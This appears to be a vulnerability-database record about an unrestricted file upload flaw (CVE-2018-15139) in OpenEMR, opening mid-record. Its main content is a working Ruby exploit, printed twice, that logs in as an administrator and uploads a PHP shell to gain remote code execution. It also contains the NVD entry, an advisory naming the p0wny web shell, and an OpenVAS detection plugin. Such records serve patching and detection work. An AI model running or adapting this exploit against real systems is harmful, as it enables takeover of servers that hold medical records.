\n# Tested on: OpenEMR Version 5.0.0.8 \n# References: https://www.exploit-db.com/exploits/49998 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'http/form_data' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the shell to be uploaded \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr shell.php admin pass \n#{__FILE__} exploit https://example.org:5000/ shell.php admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef upload(root_url, filepath, http) \nvuln_url = \"#{root_url}/interface/super/manage_site_files.php\" \npn = Pathname.new(filepath) \n \nparams = { \nform_image: { \ncontent_type: 'application/x-php', \nfilename: pn.basename.to_s, \nbody: pn \n}, \nbn_save: 'Save' \n} \n \nres = http.post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless (200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs upload(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163482/openemr5013msf-shell.txt"}], "cve": [{"lastseen": "2023-05-27T14:35:01", "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15139", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2022-02-10T07:23:00", "cpe": [], "id": "CVE-2018-15139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15139", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "exploitdb": [{"lastseen": "2023-05-31T14:50:49", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "EDB-ID:50122", "href": "https://www.exploit-db.com/exploits/50122", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Date: 2021-07-05\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50122.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:45", "description": "p0wny Shell is a PHP shell. An attacker might use this shell to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "checkpoint_advisories", "title": "p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9830", "CVE-2018-15139", "CVE-2018-19423", "CVE-2018-6383", "CVE-2020-29607", "CVE-2021-24155", "CVE-2021-24347"], "modified": "2021-10-19T00:00:00", "id": "CPAI-2021-0765", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-08-07T14:47:38", "description": "This host is running OpenEMR and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-08-14T00:00:00", "type": "openvas", "title": "OpenEMR < 5.0.1.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2018-15152", "CVE-2018-15155", "CVE-2018-15153", "CVE-2018-15144", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15141", "CVE-2018-15145", "CVE-2018-15147", "CVE-2018-15143", "CVE-2018-15142", "CVE-2018-15140", "CVE-2018-15146", "CVE-2018-15150", "CVE-2018-15154", "CVE-2018-15151", "CVE-2018-15156"], "modified": "2019-08-06T00:00:00", "id": "OPENVAS:1361412562310112356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenEMR < 5.0.1.4 Multiple Vulnerabilities\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112356\");\n script_version(\"2019-08-06T09:01:24+0000\");\n script_cve_id(\"CVE-2018-15139\", \"CVE-2018-15140\", \"CVE-2018-15141\",\n \"CVE-2018-15142\", \"CVE-2018-15143\", \"CVE-2018-15144\", \"CVE-2018-15145\",\n \"CVE-2018-15146\", \"CVE-2018-15147\", \"CVE-2018-15148\", \"CVE-2018-15149\",\n \"CVE-2018-15150\", \"CVE-2018-15151\", \"CVE-2018-15152\", \"CVE-2018-15153\",\n \"CVE-2018-15154\", \"CVE-2018-15155\", \"CVE-2018-15156\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-06 09:01:24 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-14 09:22:33 +0200 (Tue, 14 Aug 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"OpenEMR < 5.0.1.4 Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running OpenEMR and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws consist of multiple SQL injection vulnerabilities,\n directory traversal vulnerabilities, OS command injection vulnerabilities, an authentication bypass vulnerability\n and an unrestricted file upload vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions before 5.0.1.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenEMR version 5.0.1.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1765/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1758/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/files\");\n script_xref(name:\"URL\", value:\"https://insecurity.sh/reports/openemr.pdf\");\n script_xref(name:\"URL\", value:\"https://www.open-emr.org/wiki/index.php/OpenEMR_Patches\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_mandatory_keys(\"openemr/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[ 'version' ];\nlocation = infos[ 'location' ];\n\nif( version_is_less( version: version, test_version: \"5.0.1-4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.0.1-4\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

OpenEMR 5.0.1.3 - &#039;manage_site_files&#039; Remote Code Execution (Authenticated)

Description

Related

OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)